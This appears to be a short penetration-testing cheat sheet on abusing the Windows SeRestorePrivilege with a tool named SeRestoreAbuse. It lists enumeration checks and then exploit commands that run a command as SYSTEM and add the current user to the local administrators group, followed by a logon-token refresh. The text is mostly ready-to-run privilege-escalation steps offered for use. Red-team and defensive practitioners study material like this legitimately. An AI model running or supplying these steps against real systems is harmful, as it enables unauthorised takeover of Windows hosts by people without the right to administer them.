SeRestoreAbuse is a focused tool for abusing SeRestorePrivilege to execute a command as SYSTEM.
This path is useful when the privilege is present but manually crafting a restore-based overwrite would be slower or less reliable.
When enumerating SeRestoreAbuse opportunities, try to identify:
SeRestorePrivilegein the current token- Writable staging path
- Command to execute
- Whether the action changes group membership or spawns a shell
- Whether the target endpoint will block unsigned tooling
Enumeration
Confirm the privilege:
whoami /priv
Confirm a writable output path:
echo test > C:\Users\Public\restore_test.txt
Interesting findings include:
SeRestorePrivilegepresent- Tool execution is allowed
- Output file confirms SYSTEM execution
Once confirmed, execute a controlled command first before running a full payload.
Exploit
- Run a proof command:
SeRestoreAbuse.exe "cmd /c whoami > C:\Users\Public\restore.txt"
- Confirm execution:
type C:\Users\Public\restore.txt
- Add the current user to local administrators if permitted:
SeRestoreAbuse.exe "cmd /c net localgroup administrators <user> /add"
- Refresh the logon token.
klist purge
Sign out and back in, or create a fresh session.